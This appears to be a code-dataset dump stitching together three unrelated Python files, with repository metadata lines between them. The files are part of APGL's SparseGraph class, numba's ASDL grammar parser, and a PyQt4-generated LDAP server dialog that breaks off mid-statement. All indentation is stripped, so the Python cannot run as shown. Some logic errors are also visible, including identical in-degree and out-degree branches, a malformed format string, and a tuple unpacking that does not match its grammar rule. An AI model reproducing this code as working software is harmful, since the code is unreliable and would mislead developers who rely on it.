def getAllDirEdges(self):
"""
Returns the set of directed edges of the current graph as a matrix in which each
row corresponds to an edge. For an undirected graph, there is an edge from
v1 to v2 and from v2 to v1 if v2!=v1.
:returns: A matrix with 2 columns, and each row corresponding to an edge.
"""
(rows, cols) = numpy.nonzero(self.W)
edges = numpy.c_[rows, cols]
return edges
@staticmethod
def loadMatrix(filename):
W = scipy.io.mmread(filename)
return W.tolil()
def saveMatrix(self, W, filename):
scipy.io.mmwrite(filename, W)
def removeAllEdges(self):
"""
Removes all edges from this graph.
"""
self.W = self.W*0
#Weirdly we get nan values for the edges after doing the above line
if sparse.isspmatrix_csr(self.W) or sparse.isspmatrix_csc(self.W):
self.W.eliminate_zeros()
def concat(self, graph):
"""
Take a new graph and concatenate it to the current one. Returns a new graph
of the concatenated graphs with this graphs vertices first in the new list of
vertices.
:param graph: the input graph.
:type graph: :class:`apgl.graph.SparseGraph`
"""
Parameter.checkClass(graph, SparseGraph)
if type(graph.getVertexList()) != type(self.getVertexList()):
raise ValueError("Vertex lists must be of same type")
if graph.isUndirected() != self.isUndirected():
raise ValueError("Graphs must be of the same directed type")
numVertices = self.getNumVertices() + graph.getNumVertices()
vList = GeneralVertexList(numVertices)
vList.setVertices(self.getVertexList().getVertices(), list(range(self.getNumVertices())))
vList.setVertices(graph.getVertexList().getVertices(), list(range(self.getNumVertices(), numVertices)))
newGraph = SparseGraph(vList)
W = scipy.sparse.bmat([[self.W, None], [None, graph.W]], format="csr")
newGraph.setWeightMatrixSparse(W)
return newGraph
def normalisedLaplacianSym(self, outDegree=True, sparse=False):
"""
Compute the normalised symmetric laplacian matrix using L = I - D^-1/2 W D^-1/2,
in which W is the weight matrix and D_ii is the sum of the ith vertices weights.
:param outDegree: whether to use the out-degree for the computation of the degree matrix
:type outDegree: :class:`bool`
:param sparse: whether to return a sparse matrix or numpy array
:type sparse: :class:`bool`
:returns: A normalised symmetric laplacian matrix
"""
W = self.getSparseWeightMatrix()
if outDegree:
degrees = numpy.array(W.sum(1)).ravel()
else:
degrees = numpy.array(W.sum(1)).ravel()
L = self.weightMatrixType()((self.getNumVertices(), self.getNumVertices()))
L.setdiag(numpy.ones(self.getNumVertices()))
D2 = self.weightMatrixType()((self.getNumVertices(), self.getNumVertices()))
D2.setdiag((degrees + (degrees==0))**-0.5)
L = L - D2.dot(W).dot(D2)
if sparse == True:
return L
else:
return L.toarray()
def laplacianMatrix(self, outDegree=True, sparse=False):
"""
Return the Laplacian matrix of this graph, which is defined as L_{ii} = deg(i)
L_{ij} = -1 if an edge between i and j, otherwise L_{ij} = 0 . For a directed
graph one can specify whether to use the out-degree or in-degree.
:param outDegree: whether to use the out-degree for the computation of the degree matrix
:type outDegree: :class:`bool`
:param sparse: whether to return a sparse matrix or numpy array
:type sparse: :class:`bool`
:returns: A laplacian adjacency matrix.
"""
A = self.nativeAdjacencyMatrix()
L = self.weightMatrixType()((self.getNumVertices(), self.getNumVertices()))
if outDegree:
L.setdiag(self.outDegreeSequence())
else:
L.setdiag(self.inDegreeSequence())
L = L - A
if sparse == True:
return L
else:
return L.toarray()
def toCsr(self):
"""
Convert the internal matrix representation to csr format (compressed sparse row)
in order to improve the efficiency of certain operations.
"""
self.W = self.W.tocsr()
def toCsc(self):
"""
Convert the internal matrix representation to csc format (compressed sparse column)
in order to improve the efficiency of certain operations.
"""
self.W = self.W.tocsc()
def __str__(self):
output= super(SparseGraph, self).__str__()
output += ", edge storage " + str(type(self.W))
return output
#Class data
W = None
vList = None
undirected = None
| charanpald/APGL | apgl/graph/SparseGraph.py | Python | bsd-3-clause | 19,320 | 0.008023 |
# -*- coding: utf-8 -*-
"""An implementation of the Zephyr Abstract Syntax Definition Language.
See http://asdl.sourceforge.net/ and
http://www.cs.princeton.edu/research/techreps/TR-554-97
Only supports top level module decl, not view. I'm guessing that view
is intended to support the browser and I'm not interested in the
browser.
Changes for Python: Add support for module versions
"""
from __future__ import print_function, division, absolute_import
import os
import traceback
from . import spark
class Token(object):
# spark seems to dispatch in the parser based on a token's
# type attribute
def __init__(self, type, lineno):
self.type = type
self.lineno = lineno
def __str__(self):
return self.type
def __repr__(self):
return str(self)
class Id(Token):
def __init__(self, value, lineno):
self.type = 'Id'
self.value = value
self.lineno = lineno
def __str__(self):
return self.value
class String(Token):
def __init__(self, value, lineno):
self.type = 'String'
self.value = value
self.lineno = lineno
class ASDLSyntaxError(Exception):
def __init__(self, lineno, token=None, msg=None):
self.lineno = lineno
self.token = token
self.msg = msg
def __str__(self):
if self.msg is None:
return "Error at '%s', line %d" % (self.token, self.lineno)
else:
return "%s, line %d" % (self.msg, self.lineno)
class ASDLScanner(spark.GenericScanner, object):
def tokenize(self, input):
self.rv = []
self.lineno = 1
super(ASDLScanner, self).tokenize(input)
return self.rv
def t_id(self, s):
r"[\w\.]+"
# XXX doesn't distinguish upper vs. lower, which is
# significant for ASDL.
self.rv.append(Id(s, self.lineno))
def t_string(self, s):
r'"[^"]*"'
self.rv.append(String(s, self.lineno))
def t_xxx(self, s): # not sure what this production means
r"<="
self.rv.append(Token(s, self.lineno))
def t_punctuation(self, s):
r"[\{\}\*\=\|\(\)\,\?\:]"
self.rv.append(Token(s, self.lineno))
def t_comment(self, s):
r"\-\-[^\n]*"
pass
def t_newline(self, s):
r"\n"
self.lineno += 1
def t_whitespace(self, s):
r"[ \t]+"
pass
def t_default(self, s):
r" . +"
raise ValueError("unmatched input: %r" % s)
class ASDLParser(spark.GenericParser, object):
def __init__(self):
super(ASDLParser, self).__init__("module")
def typestring(self, tok):
return tok.type
def error(self, tok):
raise ASDLSyntaxError(tok.lineno, tok)
def p_module_0(self, xxx_todo_changeme):
" module ::= Id Id version { } "
(module, name, version, _0, _1) = xxx_todo_changeme
if module.value != "module":
raise ASDLSyntaxError(module.lineno,
msg="expected 'module', found %s" % module)
return Module(name, None, version)
def p_module(self, xxx_todo_changeme1):
" module ::= Id Id version { definitions } "
(module, name, version, _0, definitions, _1) = xxx_todo_changeme1
if module.value != "module":
raise ASDLSyntaxError(module.lineno,
msg="expected 'module', found %s" % module)
return Module(name, definitions, version)
def p_module_1(self, xxx_todo_changeme1):
" module ::= Id Id { } "
(module, name, _0, definitions, _1) = xxx_todo_changeme1
if module.value != "module":
raise ASDLSyntaxError(module.lineno,
msg="expected 'module', found %s" % module)
return Module(name, None, None)
def p_module_2(self, xxx_todo_changeme1):
" module ::= Id Id { definitions } "
(module, name, _0, definitions, _1) = xxx_todo_changeme1
if module.value != "module":
raise ASDLSyntaxError(module.lineno,
msg="expected 'module', found %s" % module)
return Module(name, definitions, None)
def p_version(self, xxx_todo_changeme2):
"version ::= Id String"
(version, V) = xxx_todo_changeme2
if version.value != "version":
raise ASDLSyntaxError(version.lineno,
msg="expected 'version', found %" % version)
return V
def p_definition_0(self, xxx_todo_changeme3):
" definitions ::= definition "
(definition,) = xxx_todo_changeme3
return definition
def p_definition_1(self, xxx_todo_changeme4):
" definitions ::= definition definitions "
(definitions, definition) = xxx_todo_changeme4
return definitions + definition
def p_definition(self, xxx_todo_changeme5):
" definition ::= Id = type "
(id, _, type) = xxx_todo_changeme5
return [Type(id, type)]
def p_type_0(self, xxx_todo_changeme6):
" type ::= product "
(product,) = xxx_todo_changeme6
return product
def p_type_1(self, xxx_todo_changeme7):
" type ::= sum "
(sum,) = xxx_todo_changeme7
return Sum(sum)
def p_type_2(self, xxx_todo_changeme8):
" type ::= sum Id ( fields ) "
(sum, id, _0, attributes, _1) = xxx_todo_changeme8
if id.value != "attributes":
raise ASDLSyntaxError(id.lineno,
msg="expected attributes, found %s" % id)
if attributes:
attributes.reverse()
return Sum(sum, attributes)
def p_product(self, xxx_todo_changeme9):
" product ::= ( fields ) "
(_0, fields, _1) = xxx_todo_changeme9
fields.reverse()
return Product(fields)
def p_sum_0(self, xxx_todo_changeme10):
" sum ::= constructor "
(constructor,) = xxx_todo_changeme10
return [constructor]
def p_sum_1(self, xxx_todo_changeme11):
" sum ::= constructor | sum "
(constructor, _, sum) = xxx_todo_changeme11
return [constructor] + sum
def p_sum_2(self, xxx_todo_changeme12):
" sum ::= constructor | sum "
(constructor, _, sum) = xxx_todo_changeme12
return [constructor] + sum
def p_constructor_0(self, xxx_todo_changeme13):
" constructor ::= Id "
(id,) = xxx_todo_changeme13
return Constructor(id)
def p_constructor_1(self, xxx_todo_changeme14):
" constructor ::= Id ( fields ) "
(id, _0, fields, _1) = xxx_todo_changeme14
fields.reverse()
return Constructor(id, fields)
def p_fields_0(self, xxx_todo_changeme15):
" fields ::= field "
(field,) = xxx_todo_changeme15
return [field]
def p_fields_1(self, xxx_todo_changeme16):
" fields ::= field , fields "
(field, _, fields) = xxx_todo_changeme16
return fields + [field]
def p_field_0(self, xxx_todo_changeme17):
" field ::= Id "
(type,) = xxx_todo_changeme17
return Field(type)
def p_field_1(self, xxx_todo_changeme18):
" field ::= Id Id "
(type, name) = xxx_todo_changeme18
return Field(type, name)
def p_field_2(self, xxx_todo_changeme19):
" field ::= Id * Id "
(type, _, name) = xxx_todo_changeme19
return Field(type, name, seq=True)
def p_field_3(self, xxx_todo_changeme20):
" field ::= Id ? Id "
(type, _, name) = xxx_todo_changeme20
return Field(type, name, opt=True)
def p_field_4(self, xxx_todo_changeme21):
" field ::= Id * "
(type, _) = xxx_todo_changeme21
return Field(type, seq=True)
def p_field_5(self, xxx_todo_changeme22):
" field ::= Id ? "
(type, _) = xxx_todo_changeme22
return Field(type, opt=True)
builtin_types = ("identifier", "string", "int", "bool", "object", "bytes")
# below is a collection of classes to capture the AST of an AST :-)
# not sure if any of the methods are useful yet, but I'm adding them
# piecemeal as they seem helpful
class AST(object):
pass # a marker class
class Module(AST):
def __init__(self, name, dfns, version):
self.name = name
self.dfns = dfns
self.version = version
self.types = {} # maps type name to value (from dfns)
for type in dfns:
self.types[type.name.value] = type.value
def __repr__(self):
return "Module(%s, %s)" % (self.name, self.dfns)
class Type(AST):
def __init__(self, name, value):
self.name = name
self.value = value
def __repr__(self):
return "Type(%s, %s)" % (self.name, self.value)
class Constructor(AST):
def __init__(self, name, fields=None):
self.name = name
self.fields = fields or []
def __repr__(self):
return "Constructor(%s, %s)" % (self.name, self.fields)
class Field(AST):
def __init__(self, type, name=None, seq=False, opt=False):
self.type = type
self.name = name
self.seq = seq
self.opt = opt
def __repr__(self):
if self.seq:
extra = ", seq=True"
elif self.opt:
extra = ", opt=True"
else:
extra = ""
if self.name is None:
return "Field(%s%s)" % (self.type, extra)
else:
return "Field(%s, %s%s)" % (self.type, self.name, extra)
class Sum(AST):
def __init__(self, types, attributes=None):
self.types = types
self.attributes = attributes or []
def __repr__(self):
if self.attributes is None:
return "Sum(%s)" % self.types
else:
return "Sum(%s, %s)" % (self.types, self.attributes)
class Product(AST):
def __init__(self, fields):
self.fields = fields
def __repr__(self):
return "Product(%s)" % self.fields
class VisitorBase(object):
def __init__(self, skip=False):
self.cache = {}
self.skip = skip
def visit(self, object, *args):
meth = self._dispatch(object)
if meth is None:
return
try:
meth(object, *args)
except Exception as err:
print(("Error visiting", repr(object)))
print(err)
traceback.print_exc()
# XXX hack
if hasattr(self, 'file'):
self.file.flush()
os._exit(1)
def _dispatch(self, object):
assert isinstance(object, AST), repr(object)
klass = object.__class__
meth = self.cache.get(klass)
if meth is None:
methname = "visit" + klass.__name__
if self.skip:
meth = getattr(self, methname, None)
else:
meth = getattr(self, methname)
self.cache[klass] = meth
return meth
class Check(VisitorBase):
def __init__(self):
super(Check, self).__init__(skip=True)
self.cons = {}
self.errors = 0
self.types = {}
def visitModule(self, mod):
for dfn in mod.dfns:
self.visit(dfn)
def visitType(self, type):
self.visit(type.value, str(type.name))
def visitSum(self, sum, name):
for t in sum.types:
self.visit(t, name)
def visitConstructor(self, cons, name):
key = str(cons.name)
conflict = self.cons.get(key)
if conflict is None:
self.cons[key] = name
else:
print(("Redefinition of constructor %s" % key))
print(("Defined in %s and %s" % (conflict, name)))
self.errors += 1
for f in cons.fields:
self.visit(f, key)
def visitField(self, field, name):
key = str(field.type)
l = self.types.setdefault(key, [])
l.append(name)
def visitProduct(self, prod, name):
for f in prod.fields:
self.visit(f, name)
def check(mod):
v = Check()
v.visit(mod)
for t in v.types:
if t not in mod.types and not t in builtin_types:
v.errors += 1
uses = ", ".join(v.types[t])
print(("Undefined type %s, used in %s" % (t, uses)))
return not v.errors
def parse(file):
scanner = ASDLScanner()
parser = ASDLParser()
buf = open(file).read()
tokens = scanner.tokenize(buf)
try:
return parser.parse(tokens)
except ASDLSyntaxError as err:
print(err)
lines = buf.split("\n")
print((lines[err.lineno - 1])) # lines starts at 0, files at 1
if __name__ == "__main__":
import glob
import sys
if len(sys.argv) > 1:
files = sys.argv[1:]
else:
testdir = "tests"
files = glob.glob(testdir + "/*.asdl")
for file in files:
print(file)
mod = parse(file)
print(("module", mod.name))
print((len(mod.dfns), "definitions"))
if not check(mod):
print("Check failed")
else:
for dfn in mod.dfns:
print(dfn.type)
| shiquanwang/numba | numba/asdl/common/asdl.py | Python | bsd-2-clause | 13,170 | 0.001974 |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/mnt/debris/devel/repo/git/luma-fixes/resources/forms/ServerDialogDesign.ui'
#
# Created: Wed May 25 21:41:09 2011
# by: PyQt4 UI code generator 4.8.3
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_ServerDialogDesign(object):
def setupUi(self, ServerDialogDesign):
ServerDialogDesign.setObjectName(_fromUtf8("ServerDialogDesign"))
ServerDialogDesign.resize(662, 430)
ServerDialogDesign.setMinimumSize(QtCore.QSize(550, 350))
self.vboxlayout = QtGui.QVBoxLayout(ServerDialogDesign)
self.vboxlayout.setObjectName(_fromUtf8("vboxlayout"))
self.splitter = QtGui.QSplitter(ServerDialogDesign)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.splitter.sizePolicy().hasHeightForWidth())
self.splitter.setSizePolicy(sizePolicy)
self.splitter.setOrientation(QtCore.Qt.Horizontal)
self.splitter.setChildrenCollapsible(False)
self.splitter.setObjectName(_fromUtf8("splitter"))
self.layout3 = QtGui.QWidget(self.splitter)
self.layout3.setObjectName(_fromUtf8("layout3"))
self.serverListGrid = QtGui.QGridLayout(self.layout3)
self.serverListGrid.setMargin(0)
self.serverListGrid.setObjectName(_fromUtf8("serverListGrid"))
self.serverListView = QtGui.QListView(self.layout3)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.serverListView.sizePolicy().hasHeightForWidth())
self.serverListView.setSizePolicy(sizePolicy)
self.serverListView.setObjectName(_fromUtf8("serverListView"))
self.serverListGrid.addWidget(self.serverListView, 0, 0, 1, 2)
self.addButton = QtGui.QPushButton(self.layout3)
self.addButton.setAutoDefault(True)
self.addButton.setDefault(False)
self.addButton.setObjectName(_fromUtf8("addButton"))
self.serverListGrid.addWidget(self.addButton, 1, 0, 1, 1)
self.deleteButton = QtGui.QPushButton(self.layout3)
self.deleteButton.setAutoDefault(True)
self.deleteButton.setObjectName(_fromUtf8("deleteButton"))
self.serverListGrid.addWidget(self.deleteButton, 1, 1, 1, 1)
self.testConnectionButton = QtGui.QPushButton(self.layout3)
self.testConnectionButton.setObjectName(_fromUtf8("testConnectionButton"))
self.serverListGrid.addWidget(self.testConnectionButton, 2, 0, 1, 2)
self.tabWidget = QtGui.QTabWidget(self.splitter)
self.tabWidget.setEnabled(True)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.tabWidget.sizePolicy().hasHeightForWidth())
self.tabWidget.setSizePolicy(sizePolicy)
self.tabWidget.setMinimumSize(QtCore.QSize(48, 48))
self.tabWidget.setObjectName(_fromUtf8("tabWidget"))
self.networkTab = QtGui.QWidget()
self.networkTab.setObjectName(_fromUtf8("networkTab"))
self.gridlayout = QtGui.QGridLayout(self.networkTab)
self.gridlayout.setObjectName(_fromUtf8("gridlayout"))
self.networkIcon = QtGui.QLabel(self.networkTab)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.networkIcon.sizePolicy().hasHeightForWidth())
self.networkIcon.setSizePolicy(sizePolicy)
self.networkIcon.setMinimumSize(QtCore.QSize(48, 48))
self.networkIcon.setText(_fromUtf8(""))
self.networkIcon.setObjectName(_fromUtf8("networkIcon"))
self.gridlayout.addWidget(self.networkIcon, 0, 0, 1, 1)
self.networkOptGrid = QtGui.QGridLayout()
self.networkOptGrid.setObjectName(_fromUtf8("networkOptGrid"))
self.networkGroup = QtGui.QGroupBox(self.networkTab)
self.networkGroup.setObjectName(_fromUtf8("networkGroup"))
self.gridLayout_5 = QtGui.QGridLayout(self.networkGroup)
self.gridLayout_5.setObjectName(_fromUtf8("gridLayout_5"))
self.networkGrid = QtGui.QGridLayout()
self.networkGrid.setObjectName(_fromUtf8("networkGrid"))
self.hostLabel = QtGui.QLabel(self.networkGroup)
self.hostLabel.setObjectName(_fromUtf8("hostLabel"))
self.networkGrid.addWidget(self.hostLabel, 0, 0, 1, 1)
self.hostEdit = QtGui.QLineEdit(self.networkGroup)
self.hostEdit.setObjectName(_fromUtf8("hostEdit"))
self.networkGrid.addWidget(self.hostEdit, 0, 1, 1, 1)
self.portLabel = QtGui.QLabel(self.networkGroup)
self.portLabel.setObjectName(_fromUtf8("portLabel"))
self.networkGrid.addWidget(self.portLabel, 2, 0, 1, 1)
self.portSpinBox = QtGui.QSpinBox(self.networkGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.portSpinBox.sizePolicy().hasHeightForWidth())
self.portSpinBox.setSizePolicy(sizePolicy)
self.portSpinBox.setMaximum(99999)
self.portSpinBox.setProperty(_fromUtf8("value"), 389)
self.portSpinBox.setObjectName(_fromUtf8("portSpinBox"))
self.networkGrid.addWidget(self.portSpinBox, 2, 1, 1, 1)
self.gridLayout_5.addLayout(self.networkGrid, 0, 0, 1, 1)
self.networkOptGrid.addWidget(self.networkGroup, 0, 0, 1, 1)
self.LDAPGroup = QtGui.QGroupBox(self.networkTab)
self.LDAPGroup.setObjectName(_fromUtf8("LDAPGroup"))
self.gridLayout_7 = QtGui.QGridLayout(self.LDAPGroup)
self.gridLayout_7.setObjectName(_fromUtf8("gridLayout_7"))
self.LDAPGrid = QtGui.QGridLayout()
self.LDAPGrid.setObjectName(_fromUtf8("LDAPGrid"))
self.aliasBox = QtGui.QCheckBox(self.LDAPGroup)
self.aliasBox.setEnabled(False)
self.aliasBox.setObjectName(_fromUtf8("aliasBox"))
self.LDAPGrid.addWidget(self.aliasBox, 0, 0, 1, 2)
self.baseDNBox = QtGui.QCheckBox(self.LDAPGroup)
self.baseDNBox.setObjectName(_fromUtf8("baseDNBox"))
self.LDAPGrid.addWidget(self.baseDNBox, 1, 0, 1, 2)
self.baseDNLabel = QtGui.QLabel(self.LDAPGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.baseDNLabel.sizePolicy().hasHeightForWidth())
self.baseDNLabel.setSizePolicy(sizePolicy)
self.baseDNLabel.setObjectName(_fromUtf8("baseDNLabel"))
self.LDAPGrid.addWidget(self.baseDNLabel, 2, 0, 1, 1)
self.baseDNEdit = QtGui.QLineEdit(self.LDAPGroup)
self.baseDNEdit.setObjectName(_fromUtf8("baseDNEdit"))
self.LDAPGrid.addWidget(self.baseDNEdit, 2, 1, 1, 1)
self.hLayout = QtGui.QHBoxLayout()
self.hLayout.setObjectName(_fromUtf8("hLayout"))
spacerItem = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.hLayout.addItem(spacerItem)
self.addBaseDNButton = QtGui.QPushButton(self.LDAPGroup)
self.addBaseDNButton.setAutoDefault(False)
self.addBaseDNButton.setObjectName(_fromUtf8("addBaseDNButton"))
self.hLayout.addWidget(self.addBaseDNButton)
self.deleteBaseDNButton = QtGui.QPushButton(self.LDAPGroup)
self.deleteBaseDNButton.setAutoDefault(False)
self.deleteBaseDNButton.setObjectName(_fromUtf8("deleteBaseDNButton"))
self.hLayout.addWidget(self.deleteBaseDNButton)
self.LDAPGrid.addLayout(self.hLayout, 3, 1, 1, 1)
self.baseDNListWidget = QtGui.QListWidget(self.LDAPGroup)
self.baseDNListWidget.setObjectName(_fromUtf8("baseDNListWidget"))
self.LDAPGrid.addWidget(self.baseDNListWidget, 4, 0, 1, 2)
self.gridLayout_7.addLayout(self.LDAPGrid, 0, 0, 1, 1)
self.networkOptGrid.addWidget(self.LDAPGroup, 1, 0, 1, 1)
self.gridlayout.addLayout(self.networkOptGrid, 0, 1, 2, 2)
spacerItem1 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridlayout.addItem(spacerItem1, 1, 0, 1, 1)
self.tabWidget.addTab(self.networkTab, _fromUtf8(""))
self.tab = QtGui.QWidget()
self.tab.setObjectName(_fromUtf8("tab"))
self.gridLayout_3 = QtGui.QGridLayout(self.tab)
self.gridLayout_3.setObjectName(_fromUtf8("gridLayout_3"))
self.gridLayout = QtGui.QGridLayout()
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.bindOptGroup = QtGui.QGroupBox(self.tab)
self.bindOptGroup.setObjectName(_fromUtf8("bindOptGroup"))
self.gridLayout_8 = QtGui.QGridLayout(self.bindOptGroup)
self.gridLayout_8.setObjectName(_fromUtf8("gridLayout_8"))
self.bindOptGrid = QtGui.QGridLayout()
self.bindOptGrid.setObjectName(_fromUtf8("bindOptGrid"))
self.bindAnonBox = QtGui.QCheckBox(self.bindOptGroup)
self.bindAnonBox.setChecked(True)
self.bindAnonBox.setObjectName(_fromUtf8("bindAnonBox"))
self.bindOptGrid.addWidget(self.bindAnonBox, 0, 0, 1, 2)
self.mechanismLabel = QtGui.QLabel(self.bindOptGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.mechanismLabel.sizePolicy().hasHeightForWidth())
self.mechanismLabel.setSizePolicy(sizePolicy)
self.mechanismLabel.setObjectName(_fromUtf8("mechanismLabel"))
self.bindOptGrid.addWidget(self.mechanismLabel, 1, 0, 1, 1)
self.mechanismBox = QtGui.QComboBox(self.bindOptGroup)
self.mechanismBox.setEnabled(False)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.mechanismBox.sizePolicy().hasHeightForWidth())
self.mechanismBox.setSizePolicy(sizePolicy)
self.mechanismBox.setObjectName(_fromUtf8("mechanismBox"))
self.mechanismBox.addItem(_fromUtf8(""))
self.mechanismBox.addItem(_fromUtf8(""))
self.mechanismBox.addItem(_fromUtf8(""))
self.mechanismBox.addItem(_fromUtf8(""))
self.mechanismBox.addItem(_fromUtf8(""))
self.mechanismBox.addItem(_fromUtf8(""))
self.mechanismBox.addItem(_fromUtf8(""))
self.bindOptGrid.addWidget(self.mechanismBox, 1, 1, 1, 1)
self.bindAsLabel = QtGui.QLabel(self.bindOptGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.bindAsLabel.sizePolicy().hasHeightForWidth())
self.bindAsLabel.setSizePolicy(sizePolicy)
self.bindAsLabel.setObjectName(_fromUtf8("bindAsLabel"))
self.bindOptGrid.addWidget(self.bindAsLabel, 2, 0, 1, 1)
self.bindAsEdit = QtGui.QLineEdit(self.bindOptGroup)
self.bindAsEdit.setEnabled(False)
self.bindAsEdit.setObjectName(_fromUtf8("bindAsEdit"))
self.bindOptGrid.addWidget(self.bindAsEdit, 2, 1, 1, 1)
self.passwordLabel = QtGui.QLabel(self.bindOptGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.passwordLabel.sizePolicy().hasHeightForWidth())
self.passwordLabel.setSizePolicy(sizePolicy)
self.passwordLabel.setObjectName(_fromUtf8("passwordLabel"))
self.bindOptGrid.addWidget(self.passwordLabel, 3, 0, 1, 1)
self.passwordEdit = QtGui.QLineEdit(self.bindOptGroup)
self.passwordEdit.setEnabled(False)
self.passwordEdit.setEchoMode(QtGui.QLineEdit.Password)
self.passwordEdit.setObjectName(_fromUtf8("passwordEdit"))
self.bindOptGrid.addWidget(self.passwordEdit, 3, 1, 1, 1)
self.gridLayout_8.addLayout(self.bindOptGrid, 0, 0, 1, 1)
spacerItem2 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout_8.addItem(spacerItem2, 1, 0, 1, 1)
self.gridLayout.addWidget(self.bindOptGroup, 5, 2, 1, 1)
self.gridLayout_3.addLayout(self.gridLayout, 0, 1, 2, 1)
self.authIcon = QtGui.QLabel(self.tab)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.authIcon.sizePolicy().hasHeightForWidth())
self.authIcon.setSizePolicy(sizePolicy)
self.authIcon.setMinimumSize(QtCore.QSize(48, 48))
self.authIcon.setText(_fromUtf8(""))
self.authIcon.setObjectName(_fromUtf8("authIcon"))
self.gridLayout_3.addWidget(self.authIcon, 0, 0, 1, 1)
spacerItem3 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout_3.addItem(spacerItem3, 1, 0, 1, 1)
self.tabWidget.addTab(self.tab, _fromUtf8(""))
self.securityTab = QtGui.QWidget()
self.securityTab.setObjectName(_fromUtf8("securityTab"))
self.gridLayout_4 = QtGui.QGridLayout(self.securityTab)
self.gridLayout_4.setObjectName(_fromUtf8("gridLayout_4"))
self.securityIcon = QtGui.QLabel(self.securityTab)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.securityIcon.sizePolicy().hasHeightForWidth())
self.securityIcon.setSizePolicy(sizePolicy)
self.securityIcon.setMinimumSize(QtCore.QSize(48, 48))
self.securityIcon.setText(_fromUtf8(""))
self.securityIcon.setObjectName(_fromUtf8("securityIcon"))
self.gridLayout_4.addWidget(self.securityIcon, 0, 0, 1, 1)
self.securityGridLayout = QtGui.QGridLayout()
self.securityGridLayout.setObjectName(_fromUtf8("securityGridLayout"))
self.securityOptGroup = QtGui.QGroupBox(self.securityTab)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.securityOptGroup.sizePolicy().hasHeightForWidth())
self.securityOptGroup.setSizePolicy(sizePolicy)
self.securityOptGroup.setObjectName(_fromUtf8("securityOptGroup"))
self.gridLayout_9 = QtGui.QGridLayout(self.securityOptGroup)
self.gridLayout_9.setObjectName(_fromUtf8("gridLayout_9"))
self.encryptionBox = QtGui.QComboBox(self.securityOptGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.encryptionBox.sizePolicy().hasHeightForWidth())
self.encryptionBox.setSizePolicy(sizePolicy)
self.encryptionBox.setMinimumSize(QtCore.QSize(0, 20))
self.encryptionBox.setObjectName(_fromUtf8("encryptionBox"))
self.encryptionBox.addItem(_fromUtf8(""))
self.encryptionBox.addItem(_fromUtf8(""))
self.encryptionBox.addItem(_fromUtf8(""))
self.gridLayout_9.addWidget(self.encryptionBox, 0, 0, 1, 1)
self.securityGridLayout.addWidget(self.securityOptGroup, 0, 0, 1, 1)
self.serverCertGroup = QtGui.QGroupBox(self.securityTab)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
